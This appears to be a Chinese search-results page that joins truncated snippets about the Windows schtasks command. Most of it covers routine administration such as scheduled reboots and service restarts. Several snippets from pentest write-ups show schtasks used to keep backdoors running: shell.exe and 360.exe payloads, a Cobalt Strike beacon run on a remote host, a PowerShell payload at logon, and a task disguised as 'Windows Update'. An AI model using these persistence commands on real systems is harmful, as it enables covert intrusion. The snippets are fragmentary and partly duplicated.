SCHTASKS /Create [/S system [/U username [/P [password]]]] [/RU username [/RP password]] /SC schedule.../U username 指定应在其中执行 SchTasks.exe 的用户上下文。 /P [password] 指定给定用户上下文的密码。...SCHTASKS /Create /S ABC /U domain\user /P password /SC MINUTE /MO 5 /TN accountant /...SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN gametime /TR c:\windows\system32\...SCHTASKS /Create /S ABC /U domain\user /P password /SC MINUTE /MO 5 /TN logtracker
> c:\test\test.log echo %COMPUTERNAME% >> c:\test\test.log echo %USERNAME% >> c:\test\test.log 创建任务 schtasks.exe.../create /tn "init" /ru SYSTEM /sc ONSTART /tr "C:\test\init.bat" 删除任务 schtasks /delete /tn init 查询任务...schtasks /query /fo TABLE schtasks /query /fo TABLE /tn init schtasks /query /fo LIST schtasks /query.../fo LIST /tn init 手动运行任务 schtasks /run /tn init
/u User /p 密码 ) schtasks run 立即运行计划任务。...schtasks /run /tn "Security Script" 作为响应,SchTasks.exe 启动与任务相关联的脚本并显示以下消息: SUCCESS: Attempted...在远程计算机上运行任务 以下命令用于在远程计算机 Svr01 上启动 Update 任务:schtasks /run /tn Update /s Svr01 在这种情况下,SchTasks.exe 显示以下错误消息...正如消息提示的那样,Schtasks 尝试启动程序,但它无法验证该程序实际上已经启动。 schtasks end 停止由任务启动的程序。...示例 终止本地计算机上的任务 以下命令用于终止由 My Notepad 任务启动的 Notepad.exe 实例: schtasks /end /tn "My Notepad" 作为响应,SchTasks.exe
添加一个每隔一段时间就重启服务的计划任务,一句命令搞定计划任务添加 例如 ①每天2点触发后、每隔120分钟(2小时)重启一次远程服务 schtasks.exe /CREATE /ru system /rl..." /enable schtasks /run /tn "\restart_computer" 【每天16点定时执行重启】英文时间格式 schtasks.exe /CREATE /ru system.../tn "\restart_computer" /ru SYSTEM /st 16:00 /sd 01/01/1900 schtasks /change /tn "\restart_computer".../enable schtasks /run /tn "\restart_computer" 【每隔5分钟执行一次重启】中文时间格式 schtasks.exe /CREATE /ru system...-r -t 0" /f schtasks /change /tn "\restart_computer" /ru SYSTEM /st 00:00 /sd 01/01/1900 schtasks /change
1.帮助文档 使用如下命令查看schtasks的帮助文档,以便更多的了解该命令。 C:\Users\Administrator>schtasks /?...SCHTASKS /parameter [arguments] 描述: 允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划任 务。...Examples: SCHTASKS SCHTASKS /? SCHTASKS /Run /? SCHTASKS /End /? SCHTASKS /Create /?...SCHTASKS /Delete /? SCHTASKS /Query /? SCHTASKS /Change /? SCHTASKS /ShowSid /? ...2.查看系统默认任务 使用schtasks 命令,或带query参数,schtasks /query查询系统当前执行任务。
\DISPLAY2" /f schtasks.exe /run /tn enable_display1 schtasks.exe /run /tn disable_display2 #仅在2显示(腾讯云控制台...\DISPLAY1" /f schtasks.exe /run /tn enable_display2 schtasks.exe /run /tn disable_display1 【扩展:1为主】...\DISPLAY1" /f schtasks.exe /run /tn enable_display1 schtasks.exe /run /tn enable_display2 schtasks.exe...\DISPLAY2" /f schtasks.exe /run /tn enable_display2 schtasks.exe /run /tn enable_display1 schtasks.exe...\DISPLAY1" /f #schtasks /change /tn "enable_display1" /st 00:00 /sd 1900/01/01 schtasks.exe /create
---- 计划任务执行命令 schtasks(计划任务)语法 # 一、执行bat schtasks /create /tn task1 /U 域\域用户 /P 域用户密码 /tr 执行的命令或者bat路径.../sc ONSTART /s 域机器IP /RU system # 二、运行 schtasks /run /tn task1 /s 域机子IP /U 域\域用户 /P 域用户密码 # 三、删除计划任务...schtasks /F /delete /tn task1 /s 域机子IP /U 域\域用户 /P 域用户密码 /RU system :立即执行,以system权限执行 # 域用户 schtasks...\1.bat /sc ONSTART /s 192.168.1.1 /RU system schtasks /run /tn task1 /s 192.168.1.1 /U a\username /P...password schtasks /F /delete /tn task1 /s 192.168.1.1 /U a\username /P password schtasks(计划任务)实例 我先在本地创建一个
补充知识 at命令与与schtasks的区别是什么? 如果是XP系统用schtasks命令不能在前台处理,反而用at命令加上/interactive参数到可以在前台执行。...注意事项: WIN7及以上不能用这个命令.如果要求WIN7执行交互式任务,则使用 schtasks.exe 实用程序(使用 “schtasks /?”...FO LIST /V /S system /U user /P password SCHTASKS /query /FO LIST /v SCHTASKS /Query /FO TABLE /NH /V...schtasks /query /s Reskit16 /fo csv /nh >> \\svr01\data\tasklogs\p0102.csv #作为响应,SchTasks.exe 会把为计算机...SCHTASKS /delete /TN doc SCHTASKS /delete /TN \{9D2AB7EB-215E-4806-8B4A-7F231CE61D78} WeiyiGeek.
补充知识 at命令与与schtasks的区别是什么? 如果是XP系统用schtasks命令不能在前台处理,反而用at命令加上/interactive参数到可以在前台执行。...注意事项: WIN7及以上不能用这个命令.如果要求WIN7执行交互式任务,则使用 schtasks.exe 实用程序(使用 “schtasks /?”...FO LIST /V /S system /U user /P password SCHTASKS /query /FO LIST /v SCHTASKS /Query /FO TABLE /NH /V...schtasks /query /s Reskit16 /fo csv /nh >> \\svr01\data\tasklogs\p0102.csv #作为响应,SchTasks.exe 会把为计算机...SCHTASKS /delete /TN doc SCHTASKS /delete /TN \{9D2AB7EB-215E-4806-8B4A-7F231CE61D78} ? WeiyiGeek.
在windows server 2012及以后的操作系统已经弃用了at命令,转而使用schtasks命令,schtasks命令比at命令更加的灵活,但是在使用schtasks命令时,就会在系统中留下日志文件...命令,schtasks命令与at命令不同,schtasks命令为先创建一个任务,然后再按需运行该任务,也可直接指定时间运行,但相对来说较于麻烦,所以这里使用按需运行任务,在创建了任务后直接让其运行即可...,每天运行一次 schtasks /run /s 192.168.3.32 /tn beacon /i # 运行beacon服务 这里可以通过schtasks命令去查看当前计划任务情况,和删除计划任务...,具体命令如下 schtasks /query | findstr beacon # 查看beacon计划任务 schtasks /delete /s 192.168.3.32 /tn beacon /...f # 删除beacon计划任务 这里,使用schtasks也成功将SQLserver上线。
Delete /TN "%planName%" /F>>%execbat% REM 任务时间 设置一个过期时间,但是立即执行 set tasktime="00:00" echo 在远程主机创建计划任务 SCHTASKS...P "%ycpwd%" /SC ONCE /ST %tasktime% /TN %planName% /TR %taskPath% /RU %ycname% /F echo 立即执行定义的计划任务 SCHTASKS....txt>%execbat% REM ....重启IIS echo iisreset>>%execbat% REM ....删除计划任务 echo yes| 始终确认 echo echo yes^| SCHTASKS.../Delete /TN "%planName%" /F>>%execbat% REM 任务时间延迟 set tasktime="00:00" echo 在远程主机创建计划任务 SCHTASKS /.../Run /S %主机地址% /U %主机地址%\%主机登陆名% /P "%密码%" /I /TN "%计划任务名%" 删除任务:SCHTASKS /Run /S %主机地址% /U %主机地址%\
article/1871411 如何修改远程端口号,参考https://cloud.tencent.com/developer/article/1557774 建议搞个定期重启远程服务的计划任务,可以用schtasks...命令创建, 参考 https://www.robvanderwoude.com/schtasks.php https://docs.microsoft.com/en-us/windows/win32/taskschd.../schtasks https://github.com/MicrosoftDocs/windowsserverdocs/blob/main/WindowsServerDocs/administration.../windows-commands/schtasks-create.md 添加一个每隔一段时间就重启机器的计划任务,一句命令搞定计划任务添加 例如如果重启机器,建议设置凌晨定时重启,例如: 每天2点触发后...、每隔1439分钟(23小时59分)重启一次机器 schtasks.exe /CREATE /ru system /rl highest /SC DAILY /MO 1 /TN restart_computer
LHOST 10.0.2.21 set target 5 exploit 在 cmd 下执行 schtask 来创建计划任务,在用户登录系统时,执行生成好的 Powershell 的 padyload: schtasks...也可以在空闲时间进行执行,命令如下: #(X64) - On System Start schtasks /create /tn PentestLab /tr "c:\windows\syswow64\...然后创建一个调度任务,当关联的事件 ID 出现时,触发任务执行: schtasks /Create /TN OnLogOff /TR C:\tmp\pentestlab.exe /SC ONEVENT...使用 Query 参数可以查看创建的任务计划: schtasks /Query /tn OnLogOff /fo List /v ? 当管理员登出系统时,触发任务执行: ?...Payload 会以 base64 编码的格式保存在注册表中,还有个模块可以在用户登录期间执行 Payload: usemodule persistence/elevated/schtasks* set
/change /tn "\stop_procmon" /ru Administrator /rp "管理员密码" /st 00:00 /sd 1900/01/01 schtasks /change...Administrator计划任务 schtasks.exe /create /tn "\start_w32time" /ru Administrator /rp "管理员密码" /rl highest.../sc ONSTART /tr "c:\windows\system32\sc.exe start w32time" /f schtasks /change /tn "\start_w32time".../change /tn "\stop_procmon" /ru Administrator /rp "管理员密码" /st 00:00 /sd 1900/01/01 schtasks /change.../tn "\stop_procmon" /Disable schtasks.exe /create /tn "\start_w32time" /ru Administrator /rp "管理员密码"
原文地址:https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/ Windows操作系统提供了一个实用程序(schtasks.exe...#(X64) - On System Start schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0...“schtasks”实用程序提供了必要的选项,因为它是其功能的一部分。...schtasks /Query /tn OnLogOff /fo List /v ? 查询计划任务 当用户管理员注销时,将创建事件ID,并在下次登录时执行有效负载。 ?...usemodule persistence/elevated/schtasks*set Listener http ?
之前版本的操作系统中,使用at命令在远程目标主机上创建计划任务的流程大致如下: 使用net time命令确定远程机器的当前时间 使用copy命令将payload文件复制到远程目标机器中 使用at/schtasks...命令启动该payload文件 删除使用at/schtasks命令创建计划任务的记录 在使用at命令在远程机器上创建计划任务之前,还需要使用net use命令建立IPC$,下面对上面的过程做一个简单的演示...命令创建计划任务 使用at命令让目标主机在指定的时间(22:22)运行一个程序: #创建一个在22:22运行的计划任务 schtasks /create /tn "test" /tr c:\shell.exe...@#$" #创建计划任务之后,如果时间间隔太长不想等,可以立即运行后门程序 schtasks /run /tn "test" /s 193.168.188.140 /u administrator...命令时会在系统中留下日志文件C:\windows\tasks\schedlgu.txt,如果只选schtasks命令后没有回显,可以配置ipc
restart_rdp_service /TR "powershell.exe -c '& {restart-service termservice -force}'" /ST 02:00 /RI 120 /DU 24:00 /f schtasks.../change /tn "restart_rdp_service" /st 00:00 /sd 1900/01/01 ②每天2点触发后、每隔1439分钟(23小时59分)重启一次远程服务 schtasks.exe.../TR "powershell.exe -c '& {restart-service termservice -force}'" /ST 02:00 /RI 1439 /DU 24:00 /f schtasks...restart_rdp_service" /st 00:00 /sd 1900/01/01 如果重启机器,建议设置凌晨定时重启,例如: 每天2点触发后、每隔1439分钟(23小时59分)重启一次机器 schtasks.exe...highest /SC DAILY /MO 1 /TN restart_computer /TR "shutdown -r -t 0" /ST 02:00 /RI 1439 /DU 24:00 /f schtasks
Windows操作系统中提供了一个实用工具schtasks.exe,系统管理可以使用该工具完成在指定日期和时间执行程序或脚本的工作。但是目前这个工具经常被黑客或者红队利用,从而实现持续性攻击。...#(X64) - On System Start schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\...schtasks /CREATE /TN "Windows Update" /TR "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe...图*-* 持续性攻击-计划任务事件ID “Query”参数可用于检索新创建的计划任务的信息:schtasks /Query /tn OnLogOff /fo List /v ?...usemodule persistence/elevated/schtasks* set Listener http ?
维稳方法一:加入出册表自启动 之所以放入注册表中,是由于我们后期的操作可能需要一个正常用户权限的shell,因为有些操作必须在对应的用户权限下才能正常进行,比如wmi,schtasks,net user...维稳方法三:Windows的计划任务(schtasks) 简介: 计划任务,顾名思义,指定时间做指定的事情,对windows来说可能是执行脚本,也可能是exe。...在win7后的版本就有了个新的功能,schtasks计划任务: ? 比如我要在十点后启用这个这个后门。...schtasks/create /tn "360"/trC:\Windows\Temp\360.exe /sc DAILY /st 10:00 /tn任务名(自定义)/tr目录,也可以是执行的命令 schtasks.../query /tn 360/v schtasks /query|findstr "360" #查询创建的任务 schtasks/run /tn 360 #立即运行创建的任务 schtasks
Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoAdminLogon" /d "1" /t REG_SZ /f #开机计划任务启用显示2 schtasks.exe...\DISPLAY2" /f schtasks /change /tn "enable_display2" /st 00:00 /sd 1900/01/01 /ru Administrator /rp "...密码" #开机计划任务禁用显示1 schtasks.exe /create /tn "disable_display1" /ru Administrator /rl highest /sc ONLOGON...\DISPLAY1" /f schtasks /change /tn "disable_display1" /st 00:00 /sd 1900/01/01 /ru Administrator /rp
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频
